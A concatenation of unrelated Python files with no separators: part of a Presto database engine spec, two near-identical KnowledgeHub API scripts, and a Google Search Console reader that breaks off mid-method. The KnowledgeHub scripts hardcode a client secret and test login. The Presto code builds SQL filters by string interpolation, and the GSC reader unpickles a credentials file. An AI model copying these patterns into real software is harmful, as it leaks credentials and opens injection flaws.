TIMESTAMP))", "P1D": "date_trunc('day', CAST({col} AS TIMESTAMP))", "P1W": "date_trunc('week', CAST({col} AS TIMESTAMP))", "P1M": "date_trunc('month', CAST({col} AS TIMESTAMP))", "P0.25Y": "date_trunc('quarter', CAST({col} AS TIMESTAMP))", "P1Y": "date_trunc('year', CAST({col} AS TIMESTAMP))", "P1W/1970-01-03T00:00:00Z": "date_add('day', 5, date_trunc('week', " "date_add('day', 1, CAST({col} AS TIMESTAMP))))", "1969-12-28T00:00:00Z/P1W": "date_add('day', -1, date_trunc('week', " "date_add('day', 1, CAST({col} AS TIMESTAMP))))", } @classmethod def get_view_names(cls, inspector: Inspector, schema: Optional[str]) -> List[str]: """Returns an empty list get_table_names() function returns all table names and view names, and get_view_names() is not implemented in sqlalchemy_presto.py https://github.com/dropbox/PyHive/blob/e25fc8440a0686bbb7a5db5de7cb1a77bdb4167a/pyhive/sqlalchemy_presto.py """ return [] @classmethod def _create_column_info(cls, name: str, data_type: str) -> dict: """ Create column info object :param name: column name :param data_type: column data type :return: column info object """ return {"name": name, "type": f"{data_type}"} @classmethod def _get_full_name(cls, names: List[Tuple[str, str]]) -> str: """ Get the full column name :param names: list of all individual column names :return: full column name """ return ".".join(column[0] for column in names if column[0]) @classmethod def _has_nested_data_types(cls, component_type: str) -> bool: """ Check if string contains a data type. We determine if there is a data type by whitespace or multiple data types by commas :param component_type: data type :return: boolean """ comma_regex = r",(?=(?:[^\"]*\"[^\"]*\")*[^\"]*$)" white_space_regex = r"\s(?=(?:[^\"]*\"[^\"]*\")*[^\"]*$)" return ( re.search(comma_regex, component_type) is not None or re.search(white_space_regex, component_type) is not None ) @classmethod def _split_data_type(cls, data_type: str, delimiter: str) -> List[str]: """ Split data type based on given delimiter. Do not split the string if the delimiter is enclosed in quotes :param data_type: data type :param delimiter: string separator (i.e. open parenthesis, closed parenthesis, comma, whitespace) :return: list of strings after breaking it by the delimiter """ return re.split( r"{}(?=(?:[^\"]*\"[^\"]*\")*[^\"]*$)".format(delimiter), data_type ) @classmethod def _parse_structural_column( cls, parent_column_name: str, parent_data_type: str, result: List[dict] ) -> None: """ Parse a row or array column :param result: list tracking the results """ formatted_parent_column_name = parent_column_name # Quote the column name if there is a space if " " in parent_column_name: formatted_parent_column_name = f'"{parent_column_name}"' full_data_type = f"{formatted_parent_column_name} {parent_data_type}" original_result_len = len(result) # split on open parenthesis ( to get the structural # data type and its component types data_types = cls._split_data_type(full_data_type, r"\(") stack: List[Tuple[str, str]] = [] for data_type in data_types: # split on closed parenthesis ) to track which component # types belong to what structural data type inner_types = cls._split_data_type(data_type, r"\)") for inner_type in inner_types: # We have finished parsing multiple structural data types if not inner_type and len(stack) > 0: stack.pop() elif cls._has_nested_data_types(inner_type): # split on comma , to get individual data types single_fields = cls._split_data_type(inner_type, ",") for single_field in single_fields: single_field = single_field.strip() # If component type starts with a comma, the first single field # will be an empty string. Disregard this empty string. if not single_field: continue # split on whitespace to get field name and data type field_info = cls._split_data_type(single_field, r"\s") # check if there is a structural data type within # overall structural data type if field_info[1] == "array" or field_info[1] == "row": stack.append((field_info[0], field_info[1])) full_parent_path = cls._get_full_name(stack) result.append( cls._create_column_info( full_parent_path, presto_type_map[field_info[1]]() ) ) else: # otherwise this field is a basic data type full_parent_path = cls._get_full_name(stack) column_name = "{}.{}".format( full_parent_path, field_info[0] ) result.append( cls._create_column_info( column_name, presto_type_map[field_info[1]]() ) ) # If the component type ends with a structural data type, do not pop # the stack. We have run across a structural data type within the # overall structural data type. Otherwise, we have completely parsed # through the entire structural data type and can move on. if not (inner_type.endswith("array") or inner_type.endswith("row")): stack.pop() # We have an array of row objects (i.e. array(row(...))) elif "array" == inner_type or "row" == inner_type: # Push a dummy object to represent the structural data type stack.append(("", inner_type)) # We have an array of a basic data types(i.e. array(varchar)). elif len(stack) > 0: # Because it is an array of a basic data type. We have finished # parsing the structural data type and can move on. stack.pop() # Unquote the column name if necessary if formatted_parent_column_name != parent_column_name: for index in range(original_result_len, len(result)): result[index]["name"] = result[index]["name"].replace( formatted_parent_column_name, parent_column_name ) @classmethod def _show_columns( cls, inspector: Inspector, table_name: str, schema: Optional[str] ) -> List[RowProxy]: """ Show presto column names :param inspector: object that performs database schema inspection :param table_name: table name :param schema: schema name :return: list of column objects """ quote = inspector.engine.dialect.identifier_preparer.quote_identifier full_table = quote(table_name) if schema: full_table = "{}.{}".format(quote(schema), full_table) columns = inspector.bind.execute("SHOW COLUMNS FROM {}".format(full_table)) return columns @classmethod def get_columns( cls, inspector: Inspector, table_name: str, schema: Optional[str] ) -> List[Dict[str, Any]]: """ Get columns from a Presto data source. This includes handling row and array data types :param inspector: object that performs database schema inspection :param table_name: table name :param schema: schema name :return: a list of results that contain column info (i.e. column name and data type) """ columns = cls._show_columns(inspector, table_name, schema) result: List[dict] = [] for column in columns: try: # parse column if it is a row or array if is_feature_enabled("PRESTO_EXPAND_DATA") and ( "array" in column.Type or "row" in column.Type ): structural_column_index = len(result) cls._parse_structural_column(column.Column, column.Type, result) result[structural_column_index]["nullable"] = getattr( column, "Null", True ) result[structural_column_index]["default"] = None continue else: # otherwise column is a basic data type column_type = presto_type_map[column.Type]() except KeyError: logging.info( "Did not recognize type {} of column {}".format( column.Type, column.Column ) ) column_type = "OTHER" column_info = cls._create_column_info(column.Column, column_type) column_info["nullable"] = getattr(column, "Null", True) column_info["default"] = None result.append(column_info) return result @classmethod def _is_column_name_quoted(cls, column_name: str) -> bool: """ Check if column name is in quotes :param column_name: column name :return: boolean """ return column_name.startswith('"') and column_name.endswith('"') @classmethod def _get_fields(cls, cols: List[dict]) -> List[ColumnClause]: """ Format column clauses where names are in quotes and labels are specified :param cols: columns :return: column clauses """ column_clauses = [] # Column names are separated by periods. This regex will find periods in a # string if they are not enclosed in quotes because if a period is enclosed in # quotes, then that period is part of a column name. dot_pattern = r"""\. # split on period (?= # look ahead (?: # create non-capture group [^\"]*\"[^\"]*\" # two quotes )*[^\"]*$) # end regex""" dot_regex = re.compile(dot_pattern, re.VERBOSE) for col in cols: # get individual column names col_names = re.split(dot_regex, col["name"]) # quote each column name if it is not already quoted for index, col_name in enumerate(col_names): if not cls._is_column_name_quoted(col_name): col_names[index] = '"{}"'.format(col_name) quoted_col_name = ".".join( col_name if cls._is_column_name_quoted(col_name) else f'"{col_name}"' for col_name in col_names ) # create column clause in the format "name"."name" AS "name.name" column_clause = literal_column(quoted_col_name).label(col["name"]) column_clauses.append(column_clause) return column_clauses @classmethod def _filter_out_array_nested_cols( cls, cols: List[dict] ) -> Tuple[List[dict], List[dict]]: """ Filter out columns that correspond to array content. We know which columns to skip because cols is a list provided to us in a specific order where a structural column is positioned right before its content. Example: Column Name: ColA, Column Data Type: array(row(nest_obj int)) cols = [ ..., ColA, ColA.nest_obj, ... ] When we run across an array, check if subsequent column names start with the array name and skip them. :param cols: columns :return: filtered list of columns and list of array columns and its nested fields """ filtered_cols = [] array_cols = [] curr_array_col_name = None for col in cols: # col corresponds to an array's content and should be skipped if curr_array_col_name and col["name"].startswith(curr_array_col_name): array_cols.append(col) continue # col is an array so we need to check if subsequent # columns correspond to the array's contents elif str(col["type"]) == "ARRAY": curr_array_col_name = col["name"] array_cols.append(col) filtered_cols.append(col) else: curr_array_col_name = None filtered_cols.append(col) return filtered_cols, array_cols @classmethod def select_star( cls, database, table_name: str, engine: Engine, schema: str = None, limit: int = 100, show_cols: bool = False, indent: bool = True, latest_partition: bool = True, cols: Optional[List[Dict[str, Any]]] = None, ) -> str: """ Include selecting properties of row objects. We cannot easily break arrays into rows, so render the whole array in its own row and skip columns that correspond to an array's contents. """ cols = cols or [] presto_cols = cols if is_feature_enabled("PRESTO_EXPAND_DATA") and show_cols: dot_regex = r"\.(?=(?:[^\"]*\"[^\"]*\")*[^\"]*$)" presto_cols = [ col for col in presto_cols if not re.search(dot_regex, col["name"]) ] return super().select_star( database, table_name, engine, schema, limit, show_cols, indent, latest_partition, presto_cols, ) @classmethod def adjust_database_uri(cls, uri, selected_schema=None): database = uri.database if selected_schema and database: selected_schema = parse.quote(selected_schema, safe="") if "/" in database: database = database.split("/")[0] + "/" + selected_schema else: database += "/" + selected_schema uri.database = database return uri @classmethod def convert_dttm(cls, target_type: str, dttm: datetime) -> str: tt = target_type.upper() if tt == "DATE": return "from_iso8601_date('{}')".format(dttm.isoformat()[:10]) if tt == "TIMESTAMP": return "from_iso8601_timestamp('{}')".format(dttm.isoformat()) return "'{}'".format(dttm.strftime("%Y-%m-%d %H:%M:%S")) @classmethod def epoch_to_dttm(cls) -> str: return "from_unixtime({col})" @classmethod def get_all_datasource_names( cls, db, datasource_type: str ) -> List[utils.DatasourceName]: datasource_df = db.get_df( "SELECT table_schema, table_name FROM INFORMATION_SCHEMA.{}S " "ORDER BY concat(table_schema, '.', table_name)".format( datasource_type.upper() ), None, ) datasource_names: List[utils.DatasourceName] = [] for unused, row in datasource_df.iterrows(): datasource_names.append( utils.DatasourceName( schema=row["table_schema"], table=row["table_name"] ) ) return datasource_names @classmethod def _build_column_hierarchy( cls, columns: List[dict], parent_column_types: List[str], column_hierarchy: dict ) -> None: """ Build a graph where the root node represents a column whose data type is in parent_column_types. A node's children represent that column's nested fields :param columns: list of columns :param parent_column_types: list of data types that decide what columns can be root nodes :param column_hierarchy: dictionary representing the graph """ if len(columns) == 0: return root = columns.pop(0) root_info = {"type": root["type"], "children": []} column_hierarchy[root["name"]] = root_info while columns: column = columns[0] # If the column name does not start with the root's name, # then this column is not a nested field if not column["name"].startswith(f"{root['name']}."): break # If the column's data type is one of the parent types, # then this column may have nested fields if str(column["type"]) in parent_column_types: cls._build_column_hierarchy( columns, parent_column_types, column_hierarchy ) root_info["children"].append(column["name"]) continue else: # The column is a nested field root_info["children"].append(column["name"]) columns.pop(0) @classmethod def _create_row_and_array_hierarchy( cls, selected_columns: List[dict] ) -> Tuple[dict, dict, List[dict]]: """ Build graphs where the root node represents a row or array and its children are that column's nested fields :param selected_columns: columns selected in a query :return: graph representing a row, graph representing an array, and a list of all the nested fields """ row_column_hierarchy: OrderedDict = OrderedDict() array_column_hierarchy: OrderedDict = OrderedDict() expanded_columns: List[dict] = [] for column in selected_columns: if column["type"].startswith("ROW"): parsed_row_columns: List[dict] = [] cls._parse_structural_column( column["name"], column["type"].lower(), parsed_row_columns ) expanded_columns = expanded_columns + parsed_row_columns[1:] filtered_row_columns, array_columns = cls._filter_out_array_nested_cols( parsed_row_columns ) cls._build_column_hierarchy( filtered_row_columns, ["ROW"], row_column_hierarchy ) cls._build_column_hierarchy( array_columns, ["ROW", "ARRAY"], array_column_hierarchy ) elif column["type"].startswith("ARRAY"): parsed_array_columns: List[dict] = [] cls._parse_structural_column( column["name"], column["type"].lower(), parsed_array_columns ) expanded_columns = expanded_columns + parsed_array_columns[1:] cls._build_column_hierarchy( parsed_array_columns, ["ROW", "ARRAY"], array_column_hierarchy ) return row_column_hierarchy, array_column_hierarchy, expanded_columns @classmethod def _create_empty_row_of_data(cls, columns: List[dict]) -> dict: """ Create an empty row of data :param columns: list of columns :return: dictionary representing an empty row of data """ return {column["name"]: "" for column in columns} @classmethod def _expand_row_data(cls, datum: dict, column: str, column_hierarchy: dict) -> None: """ Separate out nested fields and its value in a row of data :param datum: row of data :param column: row column name :param column_hierarchy: dictionary tracking structural columns and its nested fields """ if column in datum: row_data = datum[column] row_children = column_hierarchy[column]["children"] if row_data and len(row_data) != len(row_children): raise Exception( "The number of data values and number of nested" "fields are not equal" ) elif row_data: for index, data_value in enumerate(row_data): datum[row_children[index]] = data_value else: for row_child in row_children: datum[row_child] = "" @classmethod def _split_array_columns_by_process_state( cls, array_columns: List[str], array_column_hierarchy: dict, datum: dict ) -> Tuple[List[str], Set[str]]: """ Take a list of array columns and split them according to whether or not we are ready to process them from a data set :param array_columns: list of array columns :param array_column_hierarchy: graph representing array columns :param datum: row of data :return: list of array columns ready to be processed and set of array columns not ready to be processed """ array_columns_to_process = [] unprocessed_array_columns = set() child_array = None for array_column in array_columns: if array_column in datum: array_columns_to_process.append(array_column) elif str(array_column_hierarchy[array_column]["type"]) == "ARRAY": child_array = array_column unprocessed_array_columns.add(child_array) elif child_array and array_column.startswith(child_array): unprocessed_array_columns.add(array_column) else: # array without any data array_columns_to_process.append(array_column) datum[array_column] = [] return array_columns_to_process, unprocessed_array_columns @classmethod def _convert_data_list_to_array_data_dict( cls, data: List[dict], array_columns_to_process: List[str] ) -> dict: """ Pull out array data from rows of data into a dictionary where the key represents the index in the data list and the value is the array data values Example: data = [ {'ColumnA': [1, 2], 'ColumnB': 3}, {'ColumnA': [11, 22], 'ColumnB': 3} ] data dictionary = { 0: [{'ColumnA': [1, 2]], 1: [{'ColumnA': [11, 22]] } :param data: rows of data :param array_columns_to_process: array columns we want to pull out :return: data dictionary """ array_data_dict = {} for data_index, datum in enumerate(data): all_array_datum = {} for array_column in array_columns_to_process: all_array_datum[array_column] = datum[array_column] array_data_dict[data_index] = [all_array_datum] return array_data_dict @classmethod def _process_array_data( cls, data: List[dict], all_columns: List[dict], array_column_hierarchy: dict ) -> dict: """ Pull out array data that is ready to be processed into a dictionary. The key refers to the index in the original data set. The value is a list of data values. Initially this list will contain just one value, the row of data that corresponds to the index in the original data set. As we process arrays, we will pull out array values into separate rows and append them to the list of data values. Example: Original data set = [ {'ColumnA': [1, 2], 'ColumnB': [3]}, {'ColumnA': [11, 22], 'ColumnB': [33]} ] all_array_data (initially) = { 0: [{'ColumnA': [1, 2], 'ColumnB': [3}], 1: [{'ColumnA': [11, 22], 'ColumnB': [33]}] } all_array_data (after processing) = { 0: [ {'ColumnA': 1, 'ColumnB': 3}, {'ColumnA': 2, 'ColumnB': ''}, ], 1: [ {'ColumnA': 11, 'ColumnB': 33}, {'ColumnA': 22, 'ColumnB': ''}, ], } :param data: rows of data :param all_columns: list of columns :param array_column_hierarchy: graph representing array columns :return: dictionary representing processed array data """ array_columns = list(array_column_hierarchy.keys()) # Determine what columns are ready to be processed. This is necessary for # array columns that contain rows with nested arrays. We first process # the outer arrays before processing inner arrays. array_columns_to_process, unprocessed_array_columns = cls._split_array_columns_by_process_state( array_columns, array_column_hierarchy, data[0] ) # Pull out array data that is ready to be processed into a dictionary. all_array_data = cls._convert_data_list_to_array_data_dict( data, array_columns_to_process ) for original_data_index, expanded_array_data in all_array_data.items(): for array_column in array_columns: if array_column in unprocessed_array_columns: continue # Expand array values that are rows if str(array_column_hierarchy[array_column]["type"]) == "ROW": for array_value in expanded_array_data: cls._expand_row_data( array_value, array_column, array_column_hierarchy ) continue array_data = expanded_array_data[0][array_column] array_children = array_column_hierarchy[array_column] # This is an empty array of primitive data type if not array_data and not array_children["children"]: continue # Pull out complex array values into its own row of data elif array_data and array_children["children"]: for array_index, data_value in enumerate(array_data): if array_index >= len(expanded_array_data): empty_data = cls._create_empty_row_of_data(all_columns) expanded_array_data.append(empty_data) for index, datum_value in enumerate(data_value): array_child = array_children["children"][index] expanded_array_data[array_index][array_child] = datum_value # Pull out primitive array values into its own row of data elif array_data: for array_index, data_value in enumerate(array_data): if array_index >= len(expanded_array_data): empty_data = cls._create_empty_row_of_data(all_columns) expanded_array_data.append(empty_data) expanded_array_data[array_index][array_column] = data_value # This is an empty array with nested fields else: for index, array_child in enumerate(array_children["children"]): for array_value in expanded_array_data: array_value[array_child] = "" return all_array_data @classmethod def _consolidate_array_data_into_data( cls, data: List[dict], array_data: dict ) -> None: """ Consolidate data given a list representing rows of data and a dictionary representing expanded array data Example: Original data set = [ {'ColumnA': [1, 2], 'ColumnB': [3]}, {'ColumnA': [11, 22], 'ColumnB': [33]} ] array_data = { 0: [ {'ColumnA': 1, 'ColumnB': 3}, {'ColumnA': 2, 'ColumnB': ''}, ], 1: [ {'ColumnA': 11, 'ColumnB': 33}, {'ColumnA': 22, 'ColumnB': ''}, ], } Final data set = [ {'ColumnA': 1, 'ColumnB': 3}, {'ColumnA': 2, 'ColumnB': ''}, {'ColumnA': 11, 'ColumnB': 33}, {'ColumnA': 22, 'ColumnB': ''}, ] :param data: list representing rows of data :param array_data: dictionary representing expanded array data :return: list where data and array_data are combined """ data_index = 0 original_data_index = 0 while data_index < len(data): data[data_index].update(array_data[original_data_index][0]) array_data[original_data_index].pop(0) data[data_index + 1 : data_index + 1] = array_data[original_data_index] data_index = data_index + len(array_data[original_data_index]) + 1 original_data_index = original_data_index + 1 @classmethod def _remove_processed_array_columns( cls, unprocessed_array_columns: Set[str], array_column_hierarchy: dict ) -> None: """ Remove keys representing array columns that have already been processed :param unprocessed_array_columns: list of unprocessed array columns :param array_column_hierarchy: graph representing array columns """ array_columns = list(array_column_hierarchy.keys()) for array_column in array_columns: if array_column in unprocessed_array_columns: continue else: del array_column_hierarchy[array_column] @classmethod def expand_data( cls, columns: List[dict], data: List[dict] ) -> Tuple[List[dict], List[dict], List[dict]]: """ We do not immediately display rows and arrays clearly in the data grid. This method separates out nested fields and data values to help clearly display structural columns. Example: ColumnA is a row(nested_obj varchar) and ColumnB is an array(int) Original data set = [ {'ColumnA': ['a1'], 'ColumnB': [1, 2]}, {'ColumnA': ['a2'], 'ColumnB': [3, 4]}, ] Expanded data set = [ {'ColumnA': ['a1'], 'ColumnA.nested_obj': 'a1', 'ColumnB': 1}, {'ColumnA': '', 'ColumnA.nested_obj': '', 'ColumnB': 2}, {'ColumnA': ['a2'], 'ColumnA.nested_obj': 'a2', 'ColumnB': 3}, {'ColumnA': '', 'ColumnA.nested_obj': '', 'ColumnB': 4}, ] :param columns: columns selected in the query :param data: original data set :return: list of all columns(selected columns and their nested fields), expanded data set, listed of nested fields """ if not is_feature_enabled("PRESTO_EXPAND_DATA"): return columns, data, [] all_columns: List[dict] = [] # Get the list of all columns (selected fields and their nested fields) for column in columns: if column["type"].startswith("ARRAY") or column["type"].startswith("ROW"): cls._parse_structural_column( column["name"], column["type"].lower(), all_columns ) else: all_columns.append(column) # Build graphs where the root node is a row or array and its children are that # column's nested fields row_column_hierarchy, array_column_hierarchy, expanded_columns = cls._create_row_and_array_hierarchy( columns ) # Pull out a row's nested fields and their values into separate columns ordered_row_columns = row_column_hierarchy.keys() for datum in data: for row_column in ordered_row_columns: cls._expand_row_data(datum, row_column, row_column_hierarchy) while array_column_hierarchy: array_columns = list(array_column_hierarchy.keys()) # Determine what columns are ready to be processed. array_columns_to_process, unprocessed_array_columns = cls._split_array_columns_by_process_state( array_columns, array_column_hierarchy, data[0] ) all_array_data = cls._process_array_data( data, all_columns, array_column_hierarchy ) # Consolidate the original data set and the expanded array data cls._consolidate_array_data_into_data(data, all_array_data) # Remove processed array columns from the graph cls._remove_processed_array_columns( unprocessed_array_columns, array_column_hierarchy ) return all_columns, data, expanded_columns @classmethod def extra_table_metadata( cls, database, table_name: str, schema_name: str ) -> Dict[str, Any]: indexes = database.get_indexes(table_name, schema_name) if not indexes: return {} cols = indexes[0].get("column_names", []) full_table_name = table_name if schema_name and "." not in table_name: full_table_name = "{}.{}".format(schema_name, table_name) pql = cls._partition_query(full_table_name, database) col_names, latest_parts = cls.latest_partition( table_name, schema_name, database, show_first=True ) latest_parts = latest_parts or tuple([None] * len(col_names)) return { "partitions": { "cols": cols, "latest": dict(zip(col_names, latest_parts)), "partitionQuery": pql, } } @classmethod def handle_cursor(cls, cursor, query, session): """Updates progress information""" query_id = query.id logging.info(f"Query {query_id}: Polling the cursor for progress") polled = cursor.poll() # poll returns dict -- JSON status information or ``None`` # if the query is done # https://github.com/dropbox/PyHive/blob/ # b34bdbf51378b3979eaf5eca9e956f06ddc36ca0/pyhive/presto.py#L178 while polled: # Update the object and wait for the kill signal. stats = polled.get("stats", {}) query = session.query(type(query)).filter_by(id=query_id).one() if query.status in [QueryStatus.STOPPED, QueryStatus.TIMED_OUT]: cursor.cancel() break if stats: state = stats.get("state") # if already finished, then stop polling if state == "FINISHED": break completed_splits = float(stats.get("completedSplits")) total_splits = float(stats.get("totalSplits")) if total_splits and completed_splits: progress = 100 * (completed_splits / total_splits) logging.info( "Query {} progress: {} / {} " "splits".format(query_id, completed_splits, total_splits) ) if progress > query.progress: query.progress = progress session.commit() time.sleep(1) logging.info(f"Query {query_id}: Polling the cursor for progress") polled = cursor.poll() @classmethod def _extract_error_message(cls, e): if ( hasattr(e, "orig") and type(e.orig).__name__ == "DatabaseError" and isinstance(e.orig[0], dict) ): error_dict = e.orig[0] return "{} at {}: {}".format( error_dict.get("errorName"), error_dict.get("errorLocation"), error_dict.get("message"), ) if ( type(e).__name__ == "DatabaseError" and hasattr(e, "args") and len(e.args) > 0 ): error_dict = e.args[0] return error_dict.get("message") return utils.error_msg_from_exception(e) @classmethod def _partition_query( cls, table_name, database, limit=0, order_by=None, filters=None ): """Returns a partition query :param table_name: the name of the table to get partitions from :type table_name: str :param limit: the number of partitions to be returned :type limit: int :param order_by: a list of tuples of field name and a boolean that determines if that field should be sorted in descending order :type order_by: list of (str, bool) tuples :param filters: dict of field name and filter value combinations """ limit_clause = "LIMIT {}".format(limit) if limit else "" order_by_clause = "" if order_by: l = [] # noqa: E741 for field, desc in order_by: l.append(field + " DESC" if desc else "") order_by_clause = "ORDER BY " + ", ".join(l) where_clause = "" if filters: l = [] # noqa: E741 for field, value in filters.items(): l.append(f"{field} = '{value}'") where_clause = "WHERE " + " AND ".join(l) presto_version = database.get_extra().get("version") # Partition select syntax changed in v0.199, so check here. # Default to the new syntax if version is unset. partition_select_clause = ( f'SELECT * FROM "{table_name}$partitions"' if not presto_version or StrictVersion(presto_version) >= StrictVersion("0.199") else f"SHOW PARTITIONS FROM {table_name}" ) sql = textwrap.dedent( f"""\ {partition_select_clause} {where_clause} {order_by_clause} {limit_clause} """ ) return sql @classmethod def where_latest_partition( cls, table_name: str, schema: str, database, query: Select, columns: Optional[List] = None, ) -> Optional[Select]: try: col_names, values = cls.latest_partition( table_name, schema, database, show_first=True ) except Exception: # table is not partitioned return None if values is None: return None column_names = {column.get("name") for column in columns or []} for col_name, value in zip(col_names, values): if col_name in column_names: query = query.where(Column(col_name) == value) return query @classmethod def _latest_partition_from_df(cls, df) -> Optional[List[str]]: if not df.empty: return df.to_records(index=False)[0].item() return None @classmethod def latest_partition( cls, table_name: str, schema: str, database, show_first: bool = False ): """Returns col name and the latest (max) partition value for a table :param table_name: the name of the table :param schema: schema / database / namespace :param database: database query will be run against :type database: models.Database :param show_first: displays the value for the first partitioning key if there are many partitioning keys :type show_first: bool >>> latest_partition('foo_table') (['ds'], ('2018-01-01',)) """ indexes = database.get_indexes(table_name, schema) if len(indexes[0]["column_names"]) < 1: raise SupersetTemplateException( "The table should have one partitioned field" ) elif not show_first and len(indexes[0]["column_names"]) > 1: raise SupersetTemplateException( "The table should have a single partitioned field " "to use this function. You may want to use " "`presto.latest_sub_partition`" ) column_names = indexes[0]["column_names"] part_fields = [(column_name, True) for column_name in column_names] sql = cls._partition_query(table_name, database, 1, part_fields) df = database.get_df(sql, schema) return column_names, cls._latest_partition_from_df(df) @classmethod def latest_sub_partition(cls, table_name, schema, database, **kwargs): """Returns the latest (max) partition value for a table A filtering criteria should be passed for all fields that are partitioned except for the field to be returned. For example, if a table is partitioned by (``ds``, ``event_type`` and ``event_category``) and you want the latest ``ds``, you'll want to provide a filter as keyword arguments for both ``event_type`` and ``event_category`` as in ``latest_sub_partition('my_table', event_category='page', event_type='click')`` :param table_name: the name of the table, can be just the table name or a fully qualified table name as ``schema_name.table_name`` :type table_name: str :param schema: schema / database / namespace :type schema: str :param database: database query will be run against :type database: models.Database :param kwargs: keyword arguments define the filtering criteria on the partition list. There can be many of these. :type kwargs: str >>> latest_sub_partition('sub_partition_table', event_type='click') '2018-01-01' """ indexes = database.get_indexes(table_name, schema) part_fields = indexes[0]["column_names"] for k in kwargs.keys(): if k not in k in part_fields: msg = "Field [{k}] is not part of the portioning key" raise SupersetTemplateException(msg) if len(kwargs.keys()) != len(part_fields) - 1: msg = ( "A filter needs to be specified for {} out of the " "{} fields." ).format(len(part_fields) - 1, len(part_fields)) raise SupersetTemplateException(msg) for field in part_fields: if field not in kwargs.keys(): field_to_return = field sql = cls._partition_query( table_name, database, 1, [(field_to_return, True)], kwargs ) df = database.get_df(sql, schema) if df.empty: return "" return df.to_dict()[field_to_return][0]
from knowledgehub.api import KnowledgeHubAPI api = KnowledgeHubAPI(server='DEV', client_secret='3db5a6d7-4694-48a4-8a2e-e9c30d78f9ab') api.login('tester', 'tester') compoundSmile = api.ChemicalService().getSMILESByName('omeprazole') print(f'Found SMILES {compoundSmile[0]} for {'omeprazole'}') similar_compounds = api.SimilarityService().get(compoundSmile) print(f'similar compounds:{similar_compounds}')
from knowledgehub.api import KnowledgeHubAPI api = KnowledgeHubAPI(server='DEV', client_secret='3db5a6d7-4694-48a4-8a2e-e9c30d78f9ab') api.login('tester', 'tester') compoundSmile = api.ChemicalService().getSMILESByName('omeprazole') print(f'Found SMILES {compoundSmile[0]} for {"omeprazole"}') similar_compounds = api.SimilarityService().get(compoundSmile) print(f'similar compounds:{similar_compounds}')
""" Google Search Console API """ import logging import pickle from socket import timeout from googleapiclient.discovery import build from googleapiclient.errors import HttpError from oauth2client.client import OAuth2WebServerFlow from turbo_stream import ReaderInterface, write_file, write_file_to_s3 from turbo_stream.utils.date_handlers import date_range from turbo_stream.utils.request_handlers import request_handler, retry_handler logging.basicConfig( format="%(asctime)s %(name)-12s %(levelname)-8s %(message)s", level=logging.INFO ) class GoogleSearchConsoleReader(ReaderInterface): """ Google Search Console API Reader """ def __init__(self, configuration: dict, credentials: (dict, str), **kwargs): super().__init__(configuration, credentials) self.scopes = kwargs.get( "scopes", ( "https://www.googleapis.com/auth/webmasters.readonly", "https://www.googleapis.com/auth/webmasters", ), ) self.discovery_uri = kwargs.get( "discovery_uri", ("https://www.googleapis.com/discovery/v1/apis/customsearch/v1/rest"), ) self.oauth_scope = kwargs.get( "oath_scope", "https://www.googleapis.com/auth/webmasters.readonly" ) self.redirect_uri = kwargs.get("redirect_uri", "urn:ietf:wg:oauth:2.0:oob") def generate_authentication( self, auth_file_location="gsc_credentials.pickle" ) -> None: """ A user friendly method to generate a .pickle file for future authentication. For the first time, you would need to log in with your web browser based on this web authentication flow. After that, it will save your credentials in a pickle file. Every subsequent time you run the script, it will use the “pickled” credentials stored in credentials.pickle to build the connection to Search Console. """ flow = OAuth2WebServerFlow( self._credentials["installed"].get("client_id"), self._credentials["installed"].get("client_secret"), self.oauth_scope, self.redirect_uri, ) authorize_url = flow.step1_get_authorize_url() logging.info(f"Go to the following link in your browser: {authorize_url}") code = input("Enter verification code: ").strip() credentials = flow.step2_exchange(code) pickle.dump(credentials, open(auth_file_location, "wb")) def _get_service(self) -> build: """ Makes use of the .pickle cred file to establish a webmaster connection. """ with open(self._credentials, "rb") as _file: credentials = pickle.load(_file) return build( "searchconsole", "v1", credentials=credentials, cache_discovery=False ) @request_handler(wait=1, backoff_factor=0.5) @retry_handler( exceptions=(timeout, HttpError), total_tries=5, initial_wait=60, backoff_factor=5, ) def _query_handler(self, service, request, site_url): """ Run the API request that consumes a request payload and site url. This separates the request with the request handler from the rest of the logic. """ return service.searchanalytics().query(siteUrl=site_url, body=request).execute() def run_query(self): """ Consumes a .yaml config file and loops through the date and url to return relevant data from GSC API. """ service: build = self._get_service() start_date: str = self._configuration.get("start_date") end_date: str = self._configuration.get("end_date") dimensions: list = self._configuration.get("dimensions") logging.info( f"Gathering data between given dates {start_date} and {end_date}. " f"Querying for Site Url: {self._configuration.get("site_url")}." ) dimension_data_set = {} # split request by date to reduce 504 errors for dimension in dimensions: for date in date_range(start_date=start_date, end_date=end_date): logging.info(f"Querying at date: {date} for dimension: {dimension}.") # run until none is returned or there is no more data in rows row_index = 0 while True: dim_query_set = list(dict.fromkeys(["date", dimension])) response = self._query_handler( service=service, request={ "startDate": date, "endDate": date, "dimensions": dim_query_set, "metrics": self._configuration.get("metrics"), "type": self._configuration.get("type"), "rowLimit": self._configuration.get("row_limit", 25000), "startRow": row_index * self._configuration.get("row_limit", 25000), "aggregationType": self._configuration.get( "aggregation_type", "auto" ), "dimensionFilterGroups": self._configuration.get( "dimension_filter_groups", [] ), "dataState": self._configuration.get("data_state", "final"), }, site_url=self._configuration.get("site_url"), ) if response is None: logging.info("Response is None, exiting process...") break if "rows" not in response: logging.info("No more data in given row, moving on....") break # added additional data that the api does not provide for row in response["rows"]: dataset = { "site_url": self._configuration.get("site_url"), "search_type": self._configuration.get("search_type"), } # get dimension data keys and values dataset.update( dict( zip( dim_query_set, row.get("keys", []), ) ) ) # get metrics data for metric in self._configuration.get("metrics", []): dataset[metric] = row.get(metric) if dimension not in dimension_data_set: dimension_data_set[dimension] = [] dimension_data_set[dimension].append(dataset) row_index += 1 self._append_data_set(dimension_data_set) logging.info(f"{self.__class__.__name__} process complete!") return self._data_set def write_date_to_local(self, file_location): """ GSC returns queries for each dimension respectively. The response data is response_dataset = { "date": ["dimension response data"], "page": ["dimension response data"], "query": ["dimension response data"] } So each dimension will be written as its own dataset to local. :param file_location: Local file location. """ for dimension, dimension_dataset in self._data_set[0].items(): file_split = file_location.split(".") filepath = f"{file_split[0]}_{dimension}.{file_split[-1]}" logging.info(f"Writing {dimension} data to local path: {filepath}.") write_file(data=dimension_dataset, file_location=filepath) def write_partition_data_to_s3( self, bucket: str, path: str, partition: str, fmt="json" ): """ Writes a file to s3, partitioned by a given field in the dataset. Json objects will be serialised before writing. This works best with date fields where the use-case would be to reduce duplicates stored in s3. Specifying the file type in the name will serialise the data.Supported formats are Json, CSV, Parquet and Text. :param bucket: The bucket to write to in s3. :param path: The path in the bucket where the partition file will be written. :param partition: The field name in the dataset what will become the partition. :param fmt: The format to write in. :return: The partitioned dataset object """ for dimension, 